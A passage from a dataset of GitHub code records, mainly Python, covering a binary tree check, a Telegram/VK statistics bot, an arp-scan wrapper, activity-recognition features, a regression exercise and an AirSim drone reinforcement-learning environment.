tempModel.summary2()\n\n\n","repo_name":"imaugustus/Obsidia","sub_path":"Strategy/ARMA_Strategy.py","file_name":"ARMA_Strategy.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36688552542","text":"def constituiArvoreBinariaDeBusca(raiz):\r\n validade = True\r\n if raiz:\r\n if raiz.esq:\r\n if raiz.esq.dado > raiz.dado:\r\n validade = False\r\n return validade\r\n validade = constituiArvoreBinariaDeBusca(raiz.esq)\r\n if not validade:\r\n return validade\r\n if raiz.dir:\r\n if raiz.dir.dado < raiz.dado:\r\n validade = False\r\n return validade\r\n validade = constituiArvoreBinariaDeBusca(raiz.dir)\r\n return validade","repo_name":"pafev/UnB-estrutura-de-dados","sub_path":"árvores/constituiArvoreBinariaDeBusca.py","file_name":"constituiArvoreBinariaDeBusca.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18717789739","text":"# -*- coding: utf-8 -*-\n\nfrom app import logging\nfrom app.utils.post_statistics import statistics as post_statistics\nfrom app.remote.postgresql import Psql as psql\nfrom app.remote.redis import Redis as redis\nfrom telegram.ext.dispatcher import run_async\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\nfrom datetime import datetime\nfrom time import time\nimport logging\nimport asyncio\nimport requests\n\n\ndef refresh_stats(bot, call, expired=None):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n stats = call.data.split(\"|\", 1)\n if not expired:\n expired = stats[1]\n\n if int(time()) >= int(expired):\n owner_id = loop.run_until_complete(psql.fetchrow('SELECT owner_id FROM channels WHERE id = $1;',\n int(call.message.chat.id)))['owner_id']\n community_id = loop.run_until_complete(\n psql.fetchrow('SELECT community_id FROM posts WHERE chat_id = $1 AND message_id = $2;',\n int(call.message.chat.id), int(call.message.message_id)))['community_id']\n post_id = loop.run_until_complete(\n psql.fetchrow('SELECT post_id FROM posts WHERE chat_id = $1 AND message_id = $2;',\n int(call.message.chat.id), int(call.message.message_id)))['post_id']\n access_token = loop.run_until_complete(psql.fetchrow(\n 'SELECT access_token FROM users WHERE id = $1;',\n int(owner_id)\n ))['access_token']\n\n post = requests.post(\"https://api.vk.com/method/wall.getById\",\n data={\n \"posts\": str(str(community_id) + \"_\" + str(post_id)),\n \"copy_history_depth\": 1,\n \"extended\": 1,\n \"access_token\": access_token,\n \"v\": \"5.80\"\n }).json()['response']['items'][0]\n update_status = 
post_statistics(bot, posts=post, chat_id=call.message.chat.id,\n message_id=call.message.message_id, mtype=\"update\")\n if update_status == \"OK\" or update_status == \"IS NOT MODIFIED\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"✅ Статистика данной публикации была успешно обновлена! \"\n \"Нажмите на кнопку(-и) еще раз, чтобы увидеть обновленные значения. \"\n \"Обратите внимание, что клиенту потребуется до 30 секунд для их обновления.\",\n show_alert=True, cache_time=30)\n else:\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"❌ Что-то пошло не так при попытке обновлении статистики данной \"\n \"публикации, попробуйте позже.\",\n show_alert=True, cache_time=30)\n else:\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"❌ Статистика данной публикации была недавно обновлена, попробуйте \"\n \"немного позже.\",\n show_alert=True, cache_time=30)\n\n\n@run_async\ndef callback(bot, call):\n try:\n call = call.callback_query\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n if call.message:\n if call.data.startswith(\"channel_counters\"):\n counter = call.data.split(\"|\", 2)\n\n if counter[1] == \"time\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"🕒 Время публикации данного поста: {0} MSK.\".format(\n str(datetime.fromtimestamp(\n int(counter[2])).strftime(\"%d.%m.%y, %H:%M:%S\"))),\n show_alert=True, cache_time=30)\n elif counter[1] == \"likes\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"💖 Количество лайков: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"comments\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"💬 Количество комментариев: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"reposts\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"🔁 Количество репостов: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"views\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"👁 Количество просмотров: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"poll\":\n poll = loop.run_until_complete(redis.execute(\"GET\", str(\"poll&\" + str(counter[2]))))\n if not poll:\n logging.debug(\"Poll Name is None, most likely this poll isn't in the cache.\")\n refresh_stats(bot, call, expired=1)\n return\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"📋 Название голосования: {0}.\".format(\n str(poll[0:170])), show_alert=True, cache_time=30)\n elif counter[1] == \"poll_ans\":\n poll_answer = loop.run_until_complete(redis.execute(\"GET\", str(\"poll_answer&\" + str(counter[2]))))\n if not poll_answer:\n logging.debug(\"Poll Answer is None, most likely this poll isn't in the cache.\")\n refresh_stats(bot, call, expired=1)\n return\n else:\n poll_answer = poll_answer.split(\"?|&|&|!\", 1)\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"❎ Количество голосов за {0}: {1} голосов.\".format(\n str(poll_answer[0][0:140]), str(poll_answer[1])),\n show_alert=True, cache_time=30)\n elif call.data.startswith(\"channel_refresh_stats\"):\n refresh_stats(bot, call)\n bot.answer_callback_query(callback_query_id=call.id, show_alert=False)\n except Exception as e:\n logging.error(\"Exception has been occurred while trying to execute the method.\", exc_info=True)\n return 
e\n","repo_name":"mestrogov/snresistance","sub_path":"app/handlers/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"13816518367","text":"import argparse\nimport re\nimport shutil\nimport subprocess\nimport sys\n\nclass ArpScanner:\n interface = ''\n hosts = ''\n\n def __init__(self, interface, hosts='--localnet'):\n self.interface = interface\n self.hosts = hosts\n\n def scan(self):\n sudo = shutil.which('sudo')\n if not sudo:\n raise FileNotFoundError('sudo binary is needed')\n arpscan = shutil.which('arp-scan')\n if not arpscan:\n raise FileNotFoundError('arp-scan binary is needed')\n if not subprocess.getstatusoutput(sudo + ' -n true')[0] == 0:\n raise PermissionError('You must be a sudoers without password')\n pargs = [sudo, '-n', arpscan, '-I', self.interface, self.hosts]\n try:\n out = subprocess.check_output(pargs, universal_newlines=True, timeout=5)\n except subprocess.TimeoutExpired:\n return [] # the scan timed out, so there is no output to parse\n re_ip = r'(?P<ip>((2[0-5]|1[0-9]|[0-9])?[0-9]\\.){3}((2[0-5]|1[0-9]|[0-9])?[0-9]))'\n re_mac = r'(?P<mac>([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2}))'\n re_hw = r'(?P<hw>[\\w.]+)'\n pattern = re.compile(re_ip + '\\s+' + re_mac + '\\s' + re_hw)\n return [match.groupdict() for match in re.finditer(pattern, out)]\n\ndef main():\n desc = 'Command-line tool for network discovery. \\\n It is a Python wrapper for arp-scan tool. \\\n Both this command and sudo are needed.'\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('interface', help='interface to scan')\n parser.add_argument('-H', '--hosts', default='--localnet', help='host or network to scan')\n args = parser.parse_args()\n arpscan = ArpScanner(args.interface, args.hosts)\n for entry in arpscan.scan():\n print('{mac}: {ip} ({hw})'.format(**entry))\n\nif __name__ == '__main__':\n sys.exit(main())","repo_name":"MoraAndrea/controller-drone-ui","sub_path":"controller/Utils/arpscan.py","file_name":"arpscan.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73449902132","text":"from data.compile_dataset import Activity_Split, Activity, Window\nfrom features.featurizations import *\n# from copy_compile_dataset import Activity_Split, Activity, Window\n# from featurizations import *\nimport pickle\nimport numpy as np\nimport pandas as pd\n\nACCEL_AGGS = [get_std, get_RMS, get_ZCR, get_ABSDIFF, get_FFT5, get_spectral]\nVIDEO_AGGS_CENTRE = [get_std, get_range, get_ABSDIFF]\nVIDEO_AGGS_BOUNDS = [get_height_mean, get_height_std, get_height_range, get_volume_aggs]\nN_NANS = len(VIDEO_AGGS_CENTRE)*4 + len(VIDEO_AGGS_BOUNDS)*3\n\n\nclass Featurize(object):\n '''\n Class to create feature matrix in preparation for modelling from list of Window objects with raw time series\n '''\n def __init__(self, window_lst):\n '''\n sets attributes\n '''\n self.raw_windows = window_lst\n self.create_features()\n # self.create_vidfeatures()\n\n def create_features(self):\n '''\n runs through list of aggregate functions (see globals above) and assembles feature matrix\n '''\n self.activity_labels = []\n self.activity_cats = []\n self.col_labels_accel = []\n feature_matrix_accel = []\n \n self.col_labels_video = []\n feature_matrix_video = []\n\n first_iter_accel = True\n first_iter_video = True\n for win in self.raw_windows:\n feature_row_accel = []\n feature_row_video = []\n\n for acc_agg in ACCEL_AGGS:\n if 
first_iter_accel:\n data_accel, label_accel = acc_agg(win.accel)\n self.col_labels_accel.extend(label_accel)\n feature_row_accel.extend(data_accel)\n else:\n data_accel, _ = acc_agg(win.accel)\n feature_row_accel.extend(data_accel)\n\n if win.has_video:\n if win.video.shape[0] >= 8:\n centre_data = np.array(win.video.values[:, :3], dtype='float')\n bounds_data = np.array(win.video.values[:, 3:9], dtype='float')\n for vid_centre_agg in VIDEO_AGGS_CENTRE:\n if first_iter_video:\n data_video, label_video = vid_centre_agg(centre_data)\n self.col_labels_video.extend(label_video)\n feature_row_video.extend(data_video)\n else:\n data_video, _ = vid_centre_agg(centre_data)\n feature_row_video.extend(data_video)\n\n for vid_bounds_agg in VIDEO_AGGS_BOUNDS:\n if first_iter_video:\n data_video, label_video = vid_bounds_agg(bounds_data)\n self.col_labels_video.extend(label_video)\n feature_row_video.extend(data_video)\n else:\n data_video, _ = vid_bounds_agg(bounds_data)\n feature_row_video.extend(data_video)\n first_iter_video = False\n else:\n feature_row_video.extend([np.nan] * N_NANS)\n else:\n feature_row_video.extend([np.nan] * N_NANS)\n first_iter_accel = False\n\n feature_matrix_video.append(feature_row_video)\n feature_matrix_accel.append(feature_row_accel)\n self.activity_labels.append(win.name)\n self.activity_cats.append(win.category)\n self.X_accel = np.array(feature_matrix_accel)\n self.X_video = np.array(feature_matrix_video)\n\n\n\nif __name__ == \"__main__\":\n filehandle = open('features/all_data_windowed.obj', 'rb')\n AARP_data = pickle.load(filehandle)\n\n data_featured = Featurize(AARP_data.windows)\n data_featured.create_features()\n\n\n print('complete')\n\n","repo_name":"caseyolson8/Human-Activity-Recognition-wSensors","sub_path":"src/features/build_features.py","file_name":"build_features.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71280431413","text":"import pandas as pd\nimport random\n\ntraindata = pd.read_csv('ex1_train_data.csv', delimiter=';')\n\ndef mse(Y, Y_pred):\n result = 1/len(Y) * sum((Y - Y_pred) ** 2)\n return result\n\na = random.randrange(1, 100)\nb = random.randrange(1, 100)\nL = 0.0001\nepochs = 10000\n\nfor i in range(epochs):\n Y_pred = traindata['x'] * a + b\n\n n = len(Y_pred)\n\n a = a - L * (-2/n) * sum(traindata['x'] * (traindata['y'] - Y_pred))\n b = b - L * (-2/n) * sum(traindata['y'] - Y_pred)\n\nY_pred = traindata['x'] * a + b\nfinal_mse = mse(traindata['y'], Y_pred)\nprint('mse = %.3f, learned a = %3.f, learned b = %.3f')","repo_name":"Sinisca/Facens","sub_path":"Inteligência Artificial/EX_4_7.py","file_name":"EX_4_7.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3580514046","text":"\n#to są zmienne\n\ncalkowita = 4 #liczby całokowite / int / integer\n\nznaczki = \"kuc\" #ciąg znaków / string / str\n\nczyPrawda = 2 == 1 #prawda fałsz / bool / boolean\n\nprzecinek = 3.14 #liczby zmiennoprzecinkowe / float\n\n\n#zamienianie wartości\n#zamiast 1 dać trzeba jakąś wartość albo zmienną\n\nstr(1) #do stringu\nint(1) #do integeru/inta\nfloat(1) #do floatu\nbool(1) #do boolu/boolean\n\n\n#drukuje zmienną 'integer' zamienioną na string + jakiś tekst\nprint(str(integer) + \" o to nasza 
liczba\")\n","repo_name":"Blejek/UczeniePythona","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43039021327","text":"# Aを、左から要素を確定させていく\n# 既に確定させたAの要素からなる集合をSとする\n# 配るDP\ndef main():\n n, x, y = map(int, input().split())\n A = list(map(int, input().split()))\n B = list(map(int, input().split()))\n\n ALL = 1 << n\n INF = float('inf')\n DP = [INF]*ALL\n DP[0] = 0\n\n for cur_S in range(ALL):\n # x not in S\n cur_n = popcount(cur_S)\n for i, a_i in enumerate(A):\n if cur_S >> i & 1:\n continue\n nex_S = cur_S | (1 << i)\n # i, a_iをn番目に持ってくる\n # [0, n-1]は既に埋まっている\n # したがって、i以下の、cur_Sに含まれない要素の数がswap回数\n lower_i_subset = ~cur_S & ((1 << i) - 1)\n swap_cnt = popcount(lower_i_subset)\n cost_y = swap_cnt * y\n cost_x = abs(B[cur_n] - a_i)*x\n DP[nex_S] = min(DP[nex_S], DP[cur_S] + cost_x + cost_y)\n\n print(DP[ALL - 1])\n\n\ndef popcount(S):\n return bin(S).count('1')\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/abc232_f_0122.py","file_name":"abc232_f_0122.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14452181417","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport time\nimport numpy as np\nimport airsim\nimport math\nimport random \n''' \n Observation: \n Type: Box(12)\n Num Observation Min Max\n 0 Quad postion x -Inf Inf\n 1 Quad postion y -Inf Inf\n 2 Quad postion z -Inf Inf\n 3 Quad Velocity x -Inf Inf\n 4 Quad Velocity y -Inf Inf\n 5 Quad Velocity z -Inf Inf\n 6 Quad Orientation roll -pi/2 pi/2\n 7 Quad Orientation pitch -pi/2 pi/2\n 8 Quad Orientation yaw -pi/2 pi/2\n 9 Quad Angular_velocity x -Inf Inf\n 10 Quad Angular_velocity y -Inf Inf\n 11 Quad Angular_velocity z -Inf Inf\n \n Actions:\n Type: Box(4) \n Num Action Min Max \n 0 roll rate -1 +1\n 1 pitch rate -1 +1\n 2 yaw rate -1 +1\n 0 throttle 0 +1\n\n Goal positon: (8,5,16)\n This goal in Unity Frame of reference \n\n Maximum time steps = 300 \n'''\nclass AirsimEnv(gym.Env): \n state_mean = np.array([0, 0, 1.412217970937490531e-05, 0, 0, 1.647552423179149753e-02, 0, 0, 3.141592653589793116e+00, 0, 0 ,0, 6.5, 3.141])\n state_s_k = np.zeros(14)\n reward_mean = 0\n reward_s_k = 0\n k = 0\n def __init__(self):\n # try static attribute\n observation_low = -1 * np.array([np.inf,np.inf,np.inf, # positon lower limits\n np.inf,np.inf,np.inf, # linear velocity lower limits\n np.pi/2,np.pi/2,np.inf, # orientation lower limits\n np.inf,np.inf,np.inf, # angular velocity lower limits\n np.inf, np.inf]) # goal x,y,z position in local frame \n observation_high = np.array([np.inf,np.inf,np.inf, # positon upper limits\n np.inf,np.inf,np.inf, # linear velocity upper limits\n np.pi/2,np.pi/2,np.inf, # orientation upper limits\n np.inf,np.inf,np.inf, # angular velocity upper limits\n np.inf, np.inf]) # goal x,y,z position in local frame\n\n self.observation_space = spaces.Box(observation_low, observation_high, dtype=np.float32)\n \n\n actions_low = np.array([-np.inf]*3)\n actions_high = np.array([np.inf]*3)\n self.action_space = spaces.Box(actions_low, actions_high, dtype=np.float32)\n \n \n # The goal is specified in unity global coordinate system \n # then transformed to the quad coordinate system to compute the reward.\n # self.goal = np.array([goal[0],goal[1],goal[2]])\n\n self.time_step = 0 \n self.done = False\n 
self.max_eps_steps = 1500\n self.max_episode_steps = 1500\n\n self.seed()\n \n self.airsimClient = airsim.MultirotorClient()\n self.airsimClient.confirmConnection()\n self.airsimClient.enableApiControl(True)\n self.airsimClient.armDisarm(True)\n self.isReseted = False\n\n\n # self.goal = [10 * np.random.randn()\n # , 10 * np.random.randn()\n # , np.random.uniform(-5,-10)]\n # time.sleep(0.1)\n\n # def setGoal(self, goal):\n # # goal = self._r_u_to_q(np.array(goal[0],goal[1],goal[2]))\n # # goal = [2.5, 4.9, -5]\n # self.goal = [goal[0], goal[1], goal[2]]\n\n def step(self, action):\n AirsimEnv.k += 1\n # Check if the user has reseted the environment and the action is whtih in the bound \n # print(action)\n # action = np.clip(action,-1,1)\n assert self.isReseted , \"Environments should be reseted before taking an action\" \n assert self.action_space.contains(action), f\"Action {action} is out of bound\"\n self.time_step += 1\n # comit the action, \n # print(f'action0 {float(action[0])}')\n # print(f'action1 {float(action[1])}')\n # print(f'action2 {float(action[2])}')\n # print(f'action3 {float(action[3])}')\n # self.airsimClient.moveByAngleRatesThrottleAsync(float(action[0]), # roll rate\n # float(action[1]), # pitch rate\n # float(action[2]), # yaw rate\n # 0.6, # throttle\n # 0.1).join() # duration\n if not self.done:\n self.airsimClient.moveByAngleRatesZAsync(float(action[0]),\n float(action[1]),\n float(action[2]),\n self.goal[2],\n 0.01).join()\n # time.sleep(0.15)\n quad_state = self.airsimClient.getMultirotorState().kinematics_estimated\n state,state_tup = self._extract_state(quad_state)\n quad_postion = state_tup[0]\n\n goal_quad_frame = self.goal\n reward = self._compute_DTG_reward(state_tup, goal_quad_frame, action)\n # a z position high than 0.7 means the quad is under the Environment plane/terrain\n # TODO: add collision detiction\n\n # if self.time_step > 5:\n # collision_info = self.airsimClient.simGetCollisionInfo()\n # is_collided = collision_info.has_collided\n # if is_collided:\n # print(\"collision detcted\")\n # self.done = True\n # reward = -1000\n\n # if (np.abs(state[7]) > 0.6 or np.abs(state[6]) > 0.6 ):\n # print('extreme angle orientation')\n # self.done = True\n # reward = -5000\n\n if quad_postion[2] > 0.7:\n print(\"Collided\")\n self.done = True\n reward = -1e6\n\n if not self.done:\n reward = self._compute_DTG_reward(state_tup, goal_quad_frame, action)\n l2_dis = self._compute_l2_distance(quad_postion, goal_quad_frame)\n # print(f'l2 dis {l2_dis}')\n # Solved !\n if l2_dis <= 1.5:\n # self.done = True \n print(\"Solved!\")\n if self.num_reached_goals == 0:\n reward = 3e6\n print(f\"solved at {quad_postion} fot goal number {self.num_reached_goals+1}\")\n elif self.num_reached_goals == 1:\n reward = 5e6\n print(f\"solved at {quad_postion} fot goal number {self.num_reached_goals+1}\")\n else:\n reward = 9e6\n print(f\"solved at {quad_postion} fot goal number {self.num_reached_goals+1}\")\n self.done = True\n if not self.done:\n # self.goal_ind += 1\n self.goal += self.GenerateGoal(range_min=3, range_max=10, init_point=state_tup[0])\n self.goal = self.GoalsToQuadFrame(self.goal.copy())\n print(f\"new goal is {self.goal}\")\n print(f\"distance to goal {self._compute_l2_distance(quad_postion, self.goal.copy())}\")\n self.num_reached_goals += 1\n \n # elif l2_dis <= 0.3:\n # print('0.3 region')\n # reward = 1000\n # elif l2_dis <=0.5:\n # print('print 0.5 region')\n # reward = 500\n elif l2_dis >100:\n print(\"too far\")\n self.done = True\n reward = -1e6\n 
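# pack the raw (pre-normalization) state and action into plain dicts for the gym info payload\n        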
state_dict = self._state_to_dict(state)\n actions_dict = self._action_to_dict(action)\n info = {'time_step':self.time_step, 'state': state_dict,'action' :actions_dict}\n\n if self.time_step >= self.max_eps_steps:\n print(\"over time\")\n self.done = True\n reward = -1e6\n done = self.done\n\n\n # print(f'state {state}')\n # print(f'reward {reward}')\n\n # Normalize the state and reward\n self.state_mean_prev = AirsimEnv.state_mean.copy()\n AirsimEnv.state_mean = self.state_mean_prev + ((1/AirsimEnv.k)*(state.copy() - self.state_mean_prev))\n AirsimEnv.state_s_k += (state.copy() - self.state_mean_prev) * (state.copy() - AirsimEnv.state_mean.copy())\n\n if AirsimEnv.k == 2 :\n state_std = np.zeros(14)\n state_std += 0.01\n else:\n state_std = np.sqrt(AirsimEnv.state_s_k.copy()/(max(AirsimEnv.k-1,2)))\n\n #state #= (state.copy() - AirsimEnv.state_mean.copy()) / state_std.copy()\n\n self.reward_mean_prev = AirsimEnv.reward_mean\n AirsimEnv.reward_mean = self.reward_mean_prev + ((1/AirsimEnv.k)*(reward - self.reward_mean_prev))\n AirsimEnv.reward_s_k += (reward - self.reward_mean_prev) * (reward - AirsimEnv.reward_mean)\n reward_std = np.sqrt(AirsimEnv.reward_s_k/(AirsimEnv.k-1))\n\n reward = reward / reward_std\n self.reward_sum += reward\n\n if self.done:\n print(f\"reward_sum {self.reward_sum}\")\n print(f\"reward std {reward_std}\")\n print(f\"reward_mean {AirsimEnv.reward_mean}\")\n # print(f\"state {state}\")\n\n\n\n # print(f\"state {state} shape {state.shape}\")\n # print(f\"mean {self.state_mean} shape {self.state_mean.shape}\")\n # print(f\"state_std {state_std} shape {state_std.shape}\")\n\n # print(f\"norm state {state} shape {state.shape}\")\n return state, reward, done, info\n\n def reset(self):\n AirsimEnv.k += 1\n self.reward_sum = 0\n # set the goals\n # goals = [self.GenerateGoal(range_min=5, range_max=8), self.GenerateGoal(range_min=9, range_max=12), self.GenerateGoal(range_min=13, range_max=15)]\n # self.goals = self.GoalsToQuadFrame(goal)\n self.goal = self.GoalsToQuadFrame(self.GenerateGoal(range_min=3, range_max=10))\n self.num_reached_goals = 0\n self.goal_ind = 0\n print(f\"goal is {self.goal}\")\n\n self.airsimClient.confirmConnection()\n self.airsimClient.reset()\n self.airsimClient.enableApiControl(True)\n self.airsimClient.armDisarm(True)\n\n quad_state = self.airsimClient.getMultirotorState().kinematics_estimated\n # self.randomizeGoal()\n state,state_tup = self._extract_state(quad_state)\n self.isReseted = True\n self.done = False\n self.time_step = 0 \n time.sleep(0.1)\n\n # State and reward Normalization\n self.state_mean_prev = AirsimEnv.state_mean.copy()\n AirsimEnv.state_mean = self.state_mean_prev + ((1/AirsimEnv.k)*(state.copy() - self.state_mean_prev))\n AirsimEnv.state_s_k += (state.copy() - self.state_mean_prev) * (state.copy() - AirsimEnv.state_mean.copy())\n if AirsimEnv.k == 1:\n state_std = np.zeros(14)\n state_std += 0.01\n else:\n state_std = np.sqrt(AirsimEnv.state_s_k.copy()/(max(AirsimEnv.k-1,2)))\n\n\n\n # print(f\"state {state} shape {state.shape}\")\n # print(f\"mean {self.state_mean} shape {self.state_mean.shape}\")\n # print(f\"state_std {state_std} shape {state_std.shape}\")\n # print(f\"K {self.k}\")\n\n\n #state = (state - AirsimEnv.state_mean.copy()) / state_std\n\n # print(f\"norm state {state} shape {state.shape}\")\n # print(f\"Goal position {self.goal}\")\n return state\n\n \n # compute the distance to goal (DTG) reward\n def _compute_DTG_reward(self, state_tup, goal, actions):\n quad_postion = state_tup[0]\n quad_vel = 
state_tup[1]\n angles = state_tup[2]\n\n weights = [1, 1, 1, 0.05, 0.05, 0.05, 0.1, 0.1, 0.1]\n l2_dis = (( weights[0] * (quad_postion[0] - goal[0])**2) \n + ( weights[1] * (quad_postion[1] - goal[1])**2) + weights[2] * (quad_postion[2] - goal[2])**2) \n # vel_pen = weights[3] * quad_vel[0]**2 + weights[4] * quad_vel[1]**2 + weights[5] * quad_vel[2]**2\n # actions_pen = (weights[6] * (actions[0]**2)) + (weights[7] * (actions[1]**2)) +(weights[8] * (actions[2]**2))\n # angles_pen = np.sum(0.1*angles**2)\n # print(f'l2_dis {l2_dis}')\n # print(f'vel_pen {vel_pen}')\n # print(f'actions_pen {actions_pen}')\n return -l2_dis #+ vel_pen + actions_pen + angles_pen)\n\n def _extract_state(self, quad_state):\n position_x = quad_state.position.x_val\n position_y = quad_state.position.y_val\n position_z = quad_state.position.z_val\n # print(position_x, position_y, position_z)\n position = np.array([position_x, position_y, position_z ])\n # position = quad_state.position.to_numpy_array()\n linear_velocity = quad_state.linear_velocity.to_numpy_array()\n orientation_quaternions = quad_state.orientation.to_numpy_array()\n orientation_angles,_ = self._conver_quaternoins_to_euler_angles(orientation_quaternions)\n angular_velocity = quad_state.angular_velocity.to_numpy_array()\n d = self._compute_l2_distance(position, self.goal)\n angle = np.arctan2((self.goal[1] - position_y), (self.goal[0] - position_x))\n # angle *= (180 / np.pi)\n\n\n state = np.concatenate((position ,linear_velocity, orientation_angles, angular_velocity))\n state = np.append(state, d)\n state = np.append(state, angle)\n # print(f\"state {state}\")\n # print(f\"angle in degrees is {angle * 180 / np.pi}\")\n # import pdb; pdb.set_trace()\n return state, (position, linear_velocity, orientation_angles, angular_velocity, d, angle)\n\n def randomizeGoal(self):\n self.goal = [np.random.uniform(-30, 30)\n , np.random.uniform(-30, 30)\n , np.random.uniform(-5,-15)]\n\n # Convet a state vector to a dictionary fot logging purposes\n def _state_to_dict(self, state):\n state_dict = {'x position': state[0],\n 'y position': state[1],\n 'z position': state[2],\n 'x linear velocity': state[3],\n 'y linear velocity': state[4],\n 'z linear velocity': state[5],\n 'roll orientation' : state[6],\n 'pitch orientation': state[7],\n 'yaw orientation' : state[8],\n 'x angular velocity': state[9],\n 'y angular velocity': state[10],\n 'z angular velocity': state[11]}\n return state_dict\n\n # Convet an action vector to a dictionary fot logging purposes\n def _action_to_dict(self, action):\n action_dict = {'roll rate' : action[0],\n 'pitch rate': action[1],\n 'yaw rate' : action[2],\n 'throttle' : 0.6 }\n return action_dict\n\n # compute the l2/euclidian distance between two points\n def _compute_l2_distance(self, pos1, pos2):\n l2_dis = np.sqrt(((pos1[0] - pos2[0])**2 )+ ((pos1[1] - pos2[1])**2) + ((pos1[2] - pos2[2])**2) )\n return l2_dis\n\n # Convert a quaternioin values to euler angles to check for \n def _conver_quaternoins_to_euler_angles(self, q):\n # roll pitch yaw\n euler_angles_rad = np.array([\n math.atan2(2*(q[0]*q[1] + q[2]*q[3]), 1 - 2*(q[1]**2 + q[2]**2)), # roll\n math.asin(2*(q[0]*q[2] - q[3]*q[1])), # pitch\n math.atan2(2*(q[0]*q[3] + q[1]*q[2]), 1 - 2*(q[2]**2 + q[3]**2)) # yae\n ])\n euler_angles_degrees = euler_angles_rad * (180/np.pi)\n\n return euler_angles_rad, euler_angles_degrees\n\n # transform the location from unity frame of reference to the quad frame of reference\n def _r_u_to_q(self, point):\n R = 
np.array([[0,0,1],[1,0,0],[0,-1,0]])\n p_quad_frame = R.dot(point)\n if p_quad_frame[2] > 0:\n p_quad_frame[2] *= -1\n return p_quad_frame\n\n def GoalsToQuadFrame(self, goals):\n R = np.array([[0,0,1],[1,0,0],[0,-1,0]])\n\n goals = np.array(goals)\n goals_quad_frame = goals.dot(R)\n\n goals_quad_frame[2] = np.clip(goals_quad_frame[2], -10, -4)\n return goals_quad_frame\n\n # def GenerateGoal(self, range_min = 8, range_max = 10):\n # count = 1\n # d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n # dis = np.sqrt(d[0]**2 + d[1]**2+ d[2]**2)\n # while not (dis >= range_min and dis <= range_max):\n # d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n # dis = np.sqrt(d[0]**2 + d[1]**2+ d[2]**2)\n # if dis < range_min:\n # count += 1\n # else:\n # count -= 1\n # return d\n def GenerateGoal(self, range_min =5 ,range_max = 10, init_point=[0,0,0]):\n count = 1.\n num_iter = 0\n d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n dis = np.sqrt((d[0]-init_point[0])**2 + (d[1]-init_point[1])**2+ (d[2]-init_point[2])**2)\n\n while not (dis < range_max and dis > range_min):\n num_iter += 1\n d = np.random.uniform(low=-1,high=1,size=(3,)) * count\n dis = np.sqrt((d[0]-init_point[0])**2 + (d[1]-init_point[1])**2+ (d[2]-init_point[2])**2)\n\n if dis <= range_min:\n count += 0.1\n elif dis > range_max:\n count -= 0.1\n # elif num_iter >= 1000000:\n # break\n\n # print(f\"dis {dis}\")\n d_s = [d + init_point, init_point - d]\n random.shuffle(d_s)\n return d_s[0]\n\n\n\n","repo_name":"FaisalAhmed0/gym-airsim","sub_path":"gym_airsim/envs/airsm_backup.py","file_name":"airsm_backup.py","file_ext":"py","file_size_in_byte":18084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35542461985","text":"import time\nimport emoji\nimport os\n\nfrom termcolor import colored\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.common.by import By\nfrom src.errors import MainException, TypoException\n\nfrom src.helpers import system, print_typo\n\nis_windows = system()\n\n\ndef print_login_requirements():\n\n print(colored(\"\\n\\n\\nSet-up and Dependencies\", attrs=[\"reverse\"]))\n\n print(colored(\"\\n\\nPlease note:\", attrs=[\"reverse\"]) * (is_windows))\n print(colored(\"\\n\\nPlease note:\", attrs=[\"bold\", \"underline\"]) * (not is_windows))\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" Valid JSTOR login credentials are a requirement to use this tool.\"\n )\n\n print(\n \"\\n\"\n + colored(\" i \", \"blue\", attrs=[\"reverse\"]) * (is_windows)\n + emoji.emojize(\":information:\") * (not is_windows)\n + \" You will need Google Chrome installed on your device.\"\n )\n\n print(\n 